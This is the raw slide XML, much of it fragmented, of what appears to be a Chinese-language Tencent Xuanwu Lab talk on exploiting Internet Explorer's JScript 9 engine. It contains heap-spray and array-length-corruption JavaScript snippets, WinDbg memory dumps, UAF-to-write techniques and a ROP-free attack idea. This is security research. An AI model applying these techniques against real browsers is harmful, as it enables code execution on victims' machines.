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3" r:id="rId3"/>
    <p:sldId id="264" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="318" r:id="rId8"/>
    <p:sldId id="317" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="271" r:id="rId11"/>
    <p:sldId id="319" r:id="rId12"/>
    <p:sldId id="320" r:id="rId13"/>
    <p:sldId id="321" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="279" r:id="rId21"/>
    <p:sldId id="316" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="322" r:id="rId24"/>
    <p:sldId id="323" r:id="rId25"/>
    <p:sldId id="284" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="324" r:id="rId28"/>
    <p:sldId id="286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2" r:id="rId49"/>
    <p:sldId id="313" r:id="rId50"/>
  </p:sldIdLst>
  <p:sldSz cx="13004800" cy="7315200"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr marL="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E6D97"/>
    <a:srgbClr val="69A3CC"/>
    <a:srgbClr val="5750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39" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-1506" y="-42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63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CDEA-0773-41D5-904B-6D5C1493216B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13B51-8BFF-4FE0-9732-00B62817A4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738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F535D-A450-4A9B-8470-53E1635C60DD}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/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753A-4E60-47D9-BE20-18BC3A97AD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252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46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4E406-ADDC-447A-93B9-B826DE9114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747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2753A-4E60-47D9-BE20-18BC3A97AD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76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1447800"/>
            <a:ext cx="11704320" cy="5334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663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169921"/>
            <a:ext cx="11054080" cy="1452880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="57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0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292948"/>
            <a:ext cx="11704320" cy="7738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0240" y="1295400"/>
            <a:ext cx="11704320" cy="54864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35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292948"/>
            <a:ext cx="11704320" cy="7738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83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102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240" y="1295400"/>
            <a:ext cx="11704320" cy="5562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11696745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sz="50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292948"/>
            <a:ext cx="11704320" cy="773852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295400"/>
            <a:ext cx="11704320" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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14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8" r:id="rId5"/>
    <p:sldLayoutId id="2147483655" r:id="rId6"/>
    <p:sldLayoutId id="2147483659" r:id="rId7"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="1300460" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="6300" b="1" kern="1200" cap="none" spc="0">
          <a:ln w="18000">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="FFFFFF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j-lt"/>
          <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0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j-lt"/>
          <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0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j-lt"/>
          <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0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j-lt"/>
          <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0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黑体" pitchFamily="49" charset="-122"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0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j-lt"/>
          <a:ea typeface="黑体" pitchFamily="49" charset="-122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2209800"/>
            <a:ext cx="11054080" cy="1568027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ROPs are for the 99%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7600" y="4038600"/>
            <a:ext cx="9220200" cy="1137920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zh-CN" altLang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>旸</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3100" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>讯玄武安全实验室</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt; xlab@tencent.com &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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1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6400" y="2873514"/>
            <a:ext cx="12357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召唤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JScript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 5.8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利用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BSTR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实现信息泄露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ROP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7839" y="2971800"/>
            <a:ext cx="9523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800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>但是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 真的无法利用吗？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4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638" y="3085981"/>
            <a:ext cx="112325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7672" lvl="0" indent="-487672">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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诞生于和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Google V8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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的竞争，为高性能设计</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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2800" y="3048000"/>
            <a:ext cx="90348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7672" lvl="0" indent="-487672">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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内部实现和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4600" dirty="0" err="1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JScrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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 5.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 有巨大差异</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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500" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5500" dirty="0" smtClean="0"/>
              <a:t> 9 String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5500" dirty="0" smtClean="0"/>
              <a:t>对象 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5500" dirty="0" smtClean="0"/>
              <a:t>Spray</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="55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87448" y="1712458"/>
            <a:ext cx="11505782" cy="194514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"AA";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for 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 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&lt; count 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++)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str.substr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(0,2);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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7400" y="3657600"/>
            <a:ext cx="11506200" cy="2683806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0:017&gt; dc 12120000 l 10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12120000  68347170 02f8ff70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00000002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02deafb8  pq4hp...........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12120010  02deafb8 00000000 00000000 00000000  ................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12120020  68347170 02f8ff70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00000002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02deafb8  pq4hp...........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12120030  02deafb8 00000000 00000000 00000000  ................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0:017&gt; du 02deafb8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02deafb8  "AA"</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00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数组，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“BSTR”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11200" y="1524000"/>
            <a:ext cx="11582400" cy="4628948"/>
            <a:chOff x="711200" y="1483858"/>
            <a:chExt cx="11582400" cy="4628948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711200" y="1483858"/>
              <a:ext cx="11582400" cy="19451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>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:ln>
            <a:effectLst/>
            <a:extLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="97530" tIns="48765" rIns="97530" bIns="48765">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/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var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count = (0x80000-0x20)/4;	//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0x0001fff8 </a:t>
              </a:r>
            </a:p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var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intArr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= new Array(count);</a:t>
              </a:r>
            </a:p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for(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var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=0;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&lt;count;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++) {</a:t>
              </a:r>
            </a:p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  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intArr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[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i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] = 0x11111111;</a:t>
              </a:r>
            </a:p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711200" y="3429000"/>
              <a:ext cx="11582400" cy="2683806"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="2540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7530" tIns="48765" rIns="97530" bIns="48765">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/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0:004&gt; dc 01c3f9c0 l 4*2</a:t>
              </a:r>
            </a:p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01c3f9c0  6eb74534 031f6940 00000000 00000005  ................</a:t>
              </a:r>
            </a:p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01c3f9d0 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0001fff8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smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF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0d0d0010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err="1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0d0d0010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00000000  ................</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="pt-BR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0:014&gt; dc 0d060010-10 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l 4*3</a:t>
              </a:r>
              <a:endPara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endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="pt-BR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0d060000  00000000 0007fff0 00000000 00000000 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................</a:t>
              </a:r>
              <a:endPara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endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF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0d060010</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR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 00000000 0001fff8 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF00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0001fff8</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR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00000000 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................</a:t>
              </a:r>
              <a:endPara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endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="pt-BR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0d060020  11111111 11111111 11111111 11111111  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................</a:t>
              </a:r>
              <a:endPara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550400" y="6248400"/>
            <a:ext cx="274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* Internet Explorer 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500" dirty="0" smtClean="0"/>
              <a:t>找到数组数据头部长度域的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="55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1424803"/>
            <a:ext cx="11582400" cy="489979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0x14141414,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arrLenAddr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-1;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arrSpray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( 0x11111111, count, size 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writeByVul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for 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 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&lt; count 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++)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for (j = 0 ; j &lt; size ; j++)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if(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][j] != 0x11111111 )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arrLenAddr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-j*4-8;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    break;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}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}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if(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arrLenAddr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!= -1) break;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500" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5500" dirty="0" smtClean="0"/>
              <a:t> JScript 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5500" dirty="0" smtClean="0"/>
              <a:t>数组数据头部长度域</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="55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7400" y="2601414"/>
            <a:ext cx="11430000" cy="1575810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0:004&gt; dc 0d0d0010-10 l 4*3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0d0d0000  00000000 0007fff0 00000000 00000000  ................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0d0d0010  00000000 0001fff8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30000000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00000000  ...........0....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0d0d0020  11111111 11111111 11111111 11111111  ................</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00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7400" y="1524000"/>
            <a:ext cx="11429585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writeByVul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(0x0d0d0018 ,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0x30000000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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="4495800"/>
            <a:ext cx="1143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如果仅仅增加 数组数据头部长度域的值，在进行越界读取时会失败。因为在读取数组成员时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> JScript 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>会检查数组数据头部长度域和另外两处长度是否匹配。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="下箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5969000" y="2068014"/>
            <a:ext cx="988741" cy="427856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87400" y="5638800"/>
            <a:ext cx="11429585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outofbounds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[0x40000]; // failure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500" dirty="0" smtClean="0"/>
              <a:t>自动修改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5500" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5500" dirty="0" smtClean="0"/>
              <a:t> 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5500" dirty="0" smtClean="0"/>
              <a:t>数组对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="55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69616" y="2046786"/>
            <a:ext cx="11371172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[0x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00200200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] = 0x22222222;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9616" y="3124200"/>
            <a:ext cx="11371584" cy="2683806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0:004&gt; dc 01c3f9c0 l 4*2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01c3f9c0  6eb74534 031f6940 00000000 00000001  4E.n@i..........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01c3f9d0 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00200201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0d0d0010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0d0d0010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00000000  .. .............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0:004&gt; dc 0d0d0010-10 l 4*3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0d0d0000  00000000 0007fff0 00000000 00000000  ................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0d0d0010  00000000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00200201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66FF66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30000000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00000000  ...... ....0....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0d0d0020  11111111 11111111 11111111 11111111  ................</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="807844" y="1321713"/>
            <a:ext cx="114095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但是越界写入是可以成功执行的，并且在写入的同时，另外两处长度值也会被相应地修改</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2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9616" y="5799041"/>
            <a:ext cx="11371172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outofbounds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[0x40000]; // success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="下箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5969000" y="2620144"/>
            <a:ext cx="988741" cy="427856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可对 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对象自身进行喷射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数组比 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BSTR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>更有优势，不但可读还可写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私有堆、无内存隔片、很低的分配随机度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500" dirty="0" err="1" smtClean="0"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5500" dirty="0" smtClean="0"/>
              <a:t> 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5500" dirty="0" smtClean="0"/>
              <a:t> 实际上更便于漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="55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60" y="3048000"/>
            <a:ext cx="11054080" cy="1452880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>背景介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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500" dirty="0" smtClean="0"/>
              <a:t>一些新的对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="55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64272" y="1798320"/>
          <a:ext cx="8352928" cy="231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 smtClean="0"/>
                        <a:t>Int8Array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Uint8Array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Int16Array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Uint16Array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Int32Array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Uint32Array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 smtClean="0"/>
                        <a:t>ArrayBuffer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
                        <a:t>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err="1" smtClean="0"/>
                        <a:t>DataView</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
                        <a:t> Object</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN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159000" y="4343400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/>
              <a:t>更便于内存读写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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7112000" y="58674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* Internet Explorer 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 之后的版本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留给大家的问题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如何把普通</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 转化成写入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UAF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如何多次触发一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> UAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞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如果在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Windows 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之后的系统上利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BSTR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，如何绕过系统堆的隔离片？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500" dirty="0" smtClean="0"/>
              <a:t>如何利用所有这些</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="55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16600" y="3429000"/>
          <a:ext cx="6019800" cy="2743200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6019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</a:t>
                      </a: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[ecx+8],  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eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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/>
                        </a:rPr>
                        <a:t>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or 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[esi+8],   0x20000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/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r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dec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[eax+8]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70C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/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r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inc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[eax+0x10]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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</a:t>
                      </a:r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and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ebx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],     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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Consolas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dword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r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> [eax+4],   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87400" y="4267200"/>
            <a:ext cx="4953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3000" dirty="0" smtClean="0"/>
              <a:t>但是有很多种“写入”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="1295400"/>
            <a:ext cx="11353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3000" dirty="0" smtClean="0"/>
              <a:t>写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>“UAFs” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>并不罕见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>: CVE-2013-0087, CVE-2013-0094, CVE-2013-2551, CVE-2013-3111, CVE-2013-3123, CVE-2013-3146, CVE-2013-3914, CVE-2013-3915, CVE-2014-0322…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>很多 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t> 都可以转化成 写入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>UAF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0" y="3124200"/>
            <a:ext cx="9280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利用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BSTR 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或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数组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信息泄露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ROP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0600" y="3124200"/>
            <a:ext cx="5817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但是， 一定要 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 吗？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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48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00247" y="312003"/>
            <a:ext cx="3057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</a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>点穴攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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3600" y="2895600"/>
            <a:ext cx="1135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z="3700" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Windows </a:t>
            </a:r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脚本宿主或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3700" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> HTA</a:t>
            </a:r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 程序中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3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3700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3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可以调用很多种对象，比如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r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，而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3700" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3700" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 不可以</a:t>
            </a:r>
